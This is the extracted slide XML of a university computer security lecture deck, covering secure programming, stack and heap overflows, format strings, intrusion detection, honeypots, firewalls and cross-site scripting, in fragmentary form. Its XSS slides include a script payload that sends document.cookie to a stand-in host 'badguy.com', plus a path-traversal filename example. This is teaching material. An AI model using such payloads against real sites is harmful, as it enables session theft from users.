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925-C0EA-4FDB-923C-00F4930E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F0C-3873-497B-989A-596F5002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99F-C3FD-4C29-A647-DAD1F898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DFD-BD6A-4270-852F-6DB55121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727D-A326-4624-B6CF-9AAD9572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E3B9-CB00-43A1-9D1A-909E3F8F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EBBA-2490-4B78-ABF8-38E94E74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3BB0-A6D7-4F6E-AA7B-F246502D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383E-2CDE-4A78-871A-7909615B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300E-C085-485F-ADDF-5A87B519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38E1-A17E-4483-BB93-545DD3C1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6AF5-1486-4494-BB37-5490FE45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540E-84E2-4FB4-8AFF-C51A635C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5119-335E-40AC-8C09-89654B37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969B-96A1-4819-A966-F82EAF92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690E-4A77-4B22-B155-25F3F934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8A1D-12EF-4239-9E18-D83B359C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F26-CBD1-40EA-8D7D-33A8C2FC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6365-4F5B-4A32-8105-0CDF4E57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A2A-8103-4E5E-8788-7634B0CE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F64-2EBF-4119-8759-58DB4F69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713B-686C-45E1-B590-294B1495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6BE-BD2A-4DF5-816E-C1973AAF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DF2-44C5-4574-8122-EFB8621B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CEF7-425F-4E4A-880F-5954DF10FB9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C836-E159-4AA4-8953-9F085FB7270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5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enses (briefly!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e programming techniq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netration tes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ic analy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ynamic analy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vention techniq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e programming techniqu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alidate all inpu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void buffer overflows (off-by-one, unsafe string manipulation functions, …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lligent help/error mess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alidating inpu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termine acceptable input, check for match --- don’t just check against list of “non-matche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mit maximum leng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atch out for special characters, escape char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eck bounds on integer val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eck for negative inpu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alidating inpu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lenam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sallow *, ..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tml, URLs, cook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f. cross-site scripting atta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mand-line argu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en argv[0]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use printf(userInpu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printf(“%s”, userInput) instead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ing buffer overflo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arrays instead of poin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void strcpy(), strcat()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strncpy(), strncat(), inste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en these are not perfect… (e.g., no null terminat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buffers (slightly) longer than necessary to avoid “off-by-one” err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rror mess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nimize feedb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n’t (over)explain failures to untrusted us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n’t release version numbers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n’t offer “too much” help (suggested filenames, etc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tic/dynamic analy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ic analysis: run on the source code prior to deployment, can check for known flaw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flawfinder, cqu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ynamic analysis: try to catch (potential) buffer overflows during program execu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aris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tic analysis very useful, but not perf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ynamic analysis can be better (in tandem with static analysis), but can slow down execu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ynamic analysis: Libsaf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cepts all calls to, e.g., strcpy (dest, sr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alidates sufficient space in current stack frame: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|frame-pointer – dest| &gt; strlen(src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so, executes strcpy; otherwise, terminates appl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ng buffer overflo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sic stack exploit can be prevented by marking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ck segment as non-executable, or randomizing stack lo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 not defend against `return-to-libc’ exploi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verflow sets ret-addr to address of libc func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me apps need executable stack (e.g. LISP interpreter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 not block more general exploits, like heap overflo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ckGu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bed random “canaries” in stack frames and verify their integrity prior to function retur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is actually used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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="24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elpful, but not foolproof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26360" y="4507560"/>
            <a:ext cx="46728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t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52960" y="4507560"/>
            <a:ext cx="48708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re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57240" y="4507560"/>
            <a:ext cx="50976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f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95880" y="4503600"/>
            <a:ext cx="1047600" cy="37620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lo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673280" y="5257800"/>
            <a:ext cx="70135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4267080"/>
            <a:ext cx="0" cy="749520"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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3480" y="4503600"/>
            <a:ext cx="1020960" cy="376200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff33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canar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94040" y="4507560"/>
            <a:ext cx="46728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t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20640" y="4507560"/>
            <a:ext cx="48708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re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24920" y="4507560"/>
            <a:ext cx="50976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f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3280" y="4508640"/>
            <a:ext cx="1047600" cy="37620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lo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70320" y="4267080"/>
            <a:ext cx="0" cy="749520"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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11520" y="4508640"/>
            <a:ext cx="1020600" cy="371160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff33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canar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63800" y="40831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Frame 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4360" y="40831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Frame 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7960" y="4267080"/>
            <a:ext cx="0" cy="749520"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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ap overflo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heap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dynamically-allocated mem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created using mallo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not overwrite the return address (as on the stack), but can still cause havoc, e.g.:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:br>
              <a:rPr sz="2800"/>
            </a:b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       static char buf[16], *filename;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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       filename = “file.txt”;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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       …</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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       f = fopen(filename, “w+r”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verflowing buf could change the address to which filename poi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methods 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dress obfus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crypt return address on stack by XORing with random string.  Decrypt just before returning from fun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ttacker needs decryption key to set return address to desired valu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960640" y="2743200"/>
            <a:ext cx="439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rusion detec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vs. dete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ewalls (and other security mechanisms) aim to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reve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tru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DS aims to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detec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trusion in case it occu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both in tandem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fense in dep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ull prevention impossi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sooner intrusion is detected, the less the dam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DS can also be a deterrent, and can be use to detect weaknesses in other security mechanis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DS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als of I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tection and respon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terr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cove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fense against future atta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wo classes of behavior to be detec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llegal access by outsid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llegal access by insid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DS tradeof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DS based on the assumption that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attacker behavior is (sufficiently) different from legitimate user behavi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reality, there will be overla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me legitimate behavior may appear malicio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ruder can attempt to disguise their behavior as that of an honest us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alse positives/nega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arm triggered by acceptable behavi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alarm triggered by illegal behavi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ways a tradeoff between the two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e: credit card companies face the same tradeof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933480" y="1425600"/>
            <a:ext cx="7705440" cy="4032720"/>
            <a:chOff x="933480" y="1425600"/>
            <a:chExt cx="7705440" cy="4032720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="170" name=""/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1637280" y="1960200"/>
              <a:ext cx="6488280" cy="3498120"/>
              <a:chOff x="1637280" y="1960200"/>
              <a:chExt cx="6488280" cy="34981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1637280" y="2107800"/>
                <a:ext cx="6488280" cy="3350520"/>
                <a:chOff x="1637280" y="2107800"/>
                <a:chExt cx="6488280" cy="3350520"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="172" name=""/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="1647000" y="2107800"/>
                  <a:ext cx="0" cy="3350520"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="38160">
                  <a:solidFill>
                    <a:srgbClr val="cc2700"/>
                  </a:solidFill>
                  <a:miter/>
                  <a:tailEnd len="med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637280" y="5450040"/>
                  <a:ext cx="6488280" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="38160">
                  <a:solidFill>
                    <a:srgbClr val="cc2700"/>
                  </a:solidFill>
                  <a:miter/>
                  <a:tailEnd len="med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3355560" y="5310720"/>
                <a:ext cx="225720" cy="32040"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="7632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1818360" y="1960200"/>
                <a:ext cx="5502960" cy="3457800"/>
                <a:chOff x="1818360" y="1960200"/>
                <a:chExt cx="5502960" cy="34578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818360" y="1960200"/>
                  <a:ext cx="4230720" cy="3457800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1304" h="808">
                      <a:moveTo>
                        <a:pt x="0" y="808"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="803"/>
                        <a:pt x="213" y="798"/>
                        <a:pt x="284" y="694"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="355" y="590"/>
                        <a:pt x="354" y="288"/>
                        <a:pt x="425" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="496" y="80"/>
                        <a:pt x="619" y="0"/>
                        <a:pt x="709" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="799" y="142"/>
                        <a:pt x="865" y="486"/>
                        <a:pt x="964" y="609"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1063" y="732"/>
                        <a:pt x="1183" y="770"/>
                        <a:pt x="1304" y="808"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="34920">
                  <a:solidFill>
                    <a:srgbClr val="200b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273480" y="1960200"/>
                  <a:ext cx="4047840" cy="3457800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1304" h="808">
                      <a:moveTo>
                        <a:pt x="0" y="808"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="803"/>
                        <a:pt x="213" y="798"/>
                        <a:pt x="284" y="694"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="355" y="590"/>
                        <a:pt x="354" y="288"/>
                        <a:pt x="425" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="496" y="80"/>
                        <a:pt x="619" y="0"/>
                        <a:pt x="709" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="799" y="142"/>
                        <a:pt x="865" y="486"/>
                        <a:pt x="964" y="609"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1063" y="732"/>
                        <a:pt x="1183" y="770"/>
                        <a:pt x="1304" y="808"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="34920">
                  <a:solidFill>
                    <a:srgbClr val="200b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3333240" y="3228120"/>
                <a:ext cx="2714760" cy="2204280"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1692" h="1500">
                    <a:moveTo>
                      <a:pt x="0" y="1497"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="117" y="1491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="1473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="1425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="1362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="1065"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="1233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1414" y="1368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1587" y="1456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1692" y="1500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="1497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="1491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92760" y="4511160"/>
                <a:ext cx="447480" cy="546480"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="279" h="372">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="60" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1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 flipH="1">
              <a:off x="5236200" y="2694960"/>
              <a:ext cx="2362320" cy="1974960"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="cc27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52640" y="2254320"/>
              <a:ext cx="21862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  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>Overlap in observed or expected behavio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9360" y="1813320"/>
              <a:ext cx="246600" cy="440640"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="cc27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66000" y="1425600"/>
              <a:ext cx="186912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  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>Profile of authorized user behavio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68560" y="2067480"/>
              <a:ext cx="246600" cy="440640"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="cc27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82280" y="1644480"/>
              <a:ext cx="16732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  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>Profile of Intruder behavio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33480" y="1743120"/>
              <a:ext cx="14986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  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>Probability density function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543480" y="5464080"/>
            <a:ext cx="0" cy="298440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="cc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97360" y="5737320"/>
            <a:ext cx="147924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verage behaviour of intrud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37320" y="5452920"/>
            <a:ext cx="0" cy="300240"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="cc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46560" y="5726160"/>
            <a:ext cx="148284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verage behaviour of authorized us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68960" y="5427720"/>
            <a:ext cx="1922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Measurable behaviour paramete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alse alarm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y we have an IDS that is 99% accur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.e., Pr[alarm | attack] = 0.99 and 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[no alarm | no attack] = 0.9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alarm goes off -- what is the probability that an attack is taking plac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increase this probability, what should we focus on improving?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alse ala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y the probability of an attack is 1/10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Bayes’ law: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[attack | alarm]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=  Pr[alarm | attack] Pr[attack] / Pr[alarm]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= 0.99 * 0.001 / (0.99 * 0.001 + 0.01 * 0.999)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≈ 0.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.e., when an alarm goes off, 90% of the time it will be a false alarm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w best to lower this number?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st-based I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nitors events on a single ho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detect both internal and external intrus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wo general approach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omaly dete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gnature (rule-based) dete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ap overflo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also exploit heap overflows to affect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function poin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gain, possibly change the address to which the function pointer poi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potentially cause execution of arbitrary code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maly dete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nitor behavior and compare to some “baseline” behavior using statistical te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ook for deviations from “normal behavior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rmal behavior” can be defined on a global level or a per-user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rmal behavior” can be specified by a human, or learned automatically over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maly dete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reshold det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ooking at frequency of occurrence of various events, within a specific period of ti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en if attacker can thwart this, it will slow the atta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file-based (statistical anomaly detec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ook at changes from a user-specific “baseline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line behavior can be derived from audit recor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look at outliers from the mean, or more complicated (multivariate) data; in either case, need to define some appropriate metric for when unusual behavior is detec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1219320" y="568440"/>
          <a:ext cx="7772400" cy="5603760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2590560"/>
                <a:gridCol w="2430720"/>
                <a:gridCol w="27511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Metric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ff"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Type of Intrusion Detecte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Login frequency by date and time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Mean and standard deviation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Intruders are more likely to login during off-hours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requency of login at different locations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Mean and standard deviation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Intruders may login from a location that a legitimate user does not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Time since last login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Markov (time series)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reak-in to unused account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Length of session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Mean and standard deviation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Masquerader may run a much shorter or longer session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Large amount of data copied to some location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Mean and standard deviation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Detect attempt to copy large amounts of sensitive data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assword failures at login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Unusual event/ operational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Detect attempt to guess passwords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 (rule-based) dete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e a set of “bad patterns” (e.g., known exploits or known bad event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tect these patterns if they occu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maly detection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≈ looks for atypical behavi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ignature detection ≈ looks for improper behavi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ru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s should not read files in other users’ personal directo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s must not write to other users’ f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s who log in after hours often use the same files they used earli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s do not generally open disk devices directly, but rely on higher-level OS utili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s should not be logged in more than once to the same sys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s do not make copies of system progra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tributed host-based I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bine information collected at many different hosts in the networ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or more machines in the network will collect and analyze the network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udit records needs to be sent over the networ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fidentiality and integrity of the data must be preserv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ntralized architecture: single point of data collection/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centralized architecture: More than one analysis center –  more robust, but must be coordin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work-based I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nitors traffic at selected points on the networ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al time; packet-by-pack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st-based IDS – looks at user behavior, activity on host, local vie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twork-based IDS – looks at network traffic, global vie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 ty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line senso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serted in network path; all traffic passes through the sens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ssive sens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nitors a copy of network traff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ssive sensor more efficient; inline sensor can block attacks immediate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657600" y="2590920"/>
            <a:ext cx="2819520" cy="533160"/>
            <a:chOff x="3657600" y="2590920"/>
            <a:chExt cx="2819520" cy="533160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="214" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657600" y="2857320"/>
              <a:ext cx="114300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00600" y="2590920"/>
              <a:ext cx="533520" cy="533160"/>
            </a:xfrm>
            <a:prstGeom prst="diamond">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="eeb00b"/>
            </a:solidFill>
            <a:ln cap="sq"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34120" y="2857320"/>
              <a:ext cx="114300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095880" y="3505320"/>
            <a:ext cx="2743200" cy="1028520"/>
            <a:chOff x="6095880" y="3505320"/>
            <a:chExt cx="2743200" cy="1028520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6095880" y="4533840"/>
              <a:ext cx="274320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01080" y="3505320"/>
              <a:ext cx="533160" cy="533160"/>
            </a:xfrm>
            <a:prstGeom prst="diamond">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="eeb00b"/>
            </a:solidFill>
            <a:ln cap="sq"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7467480" y="4038120"/>
              <a:ext cx="0" cy="45684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 plac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ide firewall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detect attacks that penetrate firew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detect firewall misconfigur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examine outgoing traffic more easily to detect insider atta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configure based on network resources being accessed (e.g., configure differently for traffic directed to web server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utside firewall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document attacks (types/locations/number) even if prevented by firewall (can then be handled out-of-band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neypo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coy systems to lure potential attac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vert attackers from critical syste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llect information about attacker’s activ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lay attacker long enough to respo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ce honeypot is not legitimate, any access to the honeypot is suspicio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have honeypot computers, or even honeypot networ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ormat string vulnerabil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s the difference between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printf(buf);</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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printf(“%s”, buf);</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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buf holds %x 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ok at memory, and what printf expect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neypot plac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utside firewa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detect attempted connections to unused IP addresses, port scann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risk of compromised system behind firew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 not divert internal attack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ully internal honeypo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tches internal atta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detect firewall misconfigurations/vulnerabili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compromised, run the risk of a compromised sys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026240" y="2743200"/>
            <a:ext cx="226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rewall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rewalls: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de central “choke point” for all traffic entering and exiting the syst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in go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rvice control – what services can be accessed (inbound or outbound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havior control – how services are accessed (e.g., spam filtering, web content filtering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/machine control – controls access to services on a per-user/mach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rewalls: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ther go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uditing (see also intrusion detect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twork address transl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also run security functionality, e.g., IPSec, VP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they cannot protect again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 not offer full protection against insider atta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s bypassing the firewall  to connect to the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fected devices connecting to network internal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rewalls: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sitive fil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ow only traffic meeting certain crite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.e., the default is to rej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gative fil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ject traffic meeting certain crite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.e., the default is to accep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ed for firewall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not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jus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provision each computer with its own firewall/ID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 cost effect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fferent OS’s make management difficul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atches must be propagated to all machines in the sys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 not protect against insider attacks that extend beyond the local networ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ense in dep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cket filte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pply a set of rules to each incoming/outgoing pack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cket filtering may be based on any part(s) of the traffic header(s), e.g.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urce/destination IP addr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rt numb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ag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twork interface (e.g., reject packet with internal IP address if coming from the wrong interfac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advantages of packet filte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difficult to configure rules to achieve both usability and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ftp uses a dynamically-assigned port number for the data transf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sconfigurations can be easily exploi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es not examine application-level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user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es not address inherent TCP/IP vulnerabil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address spoof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teful firewal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ypical packet filtering applied on a packet-by-packet ba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also look at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contex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maintain list of active TCP connections (useful when port number are dynamically assigned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look at sequence numbers and detect repla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also use global information (e.g., number of packets to/from a particular IP addres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happen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ntf(“%x”) expects an additional argument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we could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writ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hat value instea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e “Blended attacks…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7360" y="2857680"/>
            <a:ext cx="64022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1040" y="3543480"/>
            <a:ext cx="647856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1040" y="2857680"/>
            <a:ext cx="1262160" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffcccc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86360" y="2857680"/>
            <a:ext cx="745920" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="eeb00b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eb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48120" y="2857680"/>
            <a:ext cx="746280" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="eeb00b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r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add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10240" y="2857680"/>
            <a:ext cx="746280" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cc99f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bu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933640"/>
            <a:ext cx="129528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00ff"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Frame of th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00ff"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>calling functio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03400" y="2857680"/>
            <a:ext cx="1176480" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffcccc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45040" y="3314880"/>
            <a:ext cx="152640" cy="761760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 152640"/>
              <a:gd name="textAreaRight" fmla="*/ 55080 w 15264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16200" y="10799"/>
                  <a:pt x="21600" y="10799"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162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84040" y="3781440"/>
            <a:ext cx="600120" cy="263520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65407"/>
              <a:gd name="adj2" fmla="val -1548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arg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943600" y="2437920"/>
            <a:ext cx="0" cy="38124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2438280"/>
            <a:ext cx="91440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360" y="2286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%x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3733920"/>
            <a:ext cx="1522440" cy="460440"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32912"/>
              <a:gd name="adj2" fmla="val -83046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6600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Will print the valu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sitting he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input validation b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y a program reads from a user-specified f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gram running in directory /secure, but only allows access to files in /secure/pu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ecks that the filename supplied by the user begins with /pu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the user supplies the filename “/pub/../top_secret” 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SS attac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ther input validation fla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y we have a script that echos a user’s name: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GET /welcome.cgi?name=Joe HTTP/1.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ponse is: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&lt;html&gt;&lt;title&gt; Welcome! &lt;/title&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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     Hi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="eaeaea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Joe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 &lt;/html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the user supplies the following “name”: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&lt;script&gt;alert(document.cookie)&lt;/script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SS attac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an attacker can cause an honest user to click on a specially-crafted URL, the user’s cookies can be sent to the attacker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http://victim.com/welcome.cgi ? name =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&lt;script&gt; window.open(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http://badguy.com?cookie =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  <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>”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+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document.cookie )  &lt;/script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would an attacker do thi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hish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nk from their webp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nk to a fake movie, picture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SS attac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SS attacks are a potential problem any time user-submitted content is used to generate htm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to perform extensive validation of user-supplied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ple fixes (like rejecting strings that contain “&lt;script&gt;”) can be circumven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venting XSS attacks in general is very hard (impossible(?) if certain functionality is desire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5-07T00:41:29Z</dcterms:modified>
  <cp:revision>747</cp:revision>
  <dc:subject/>
  <dc:title>CMSC 414 Computer (and Network) Security</dc:title>
</cp:coreProperties>
</file>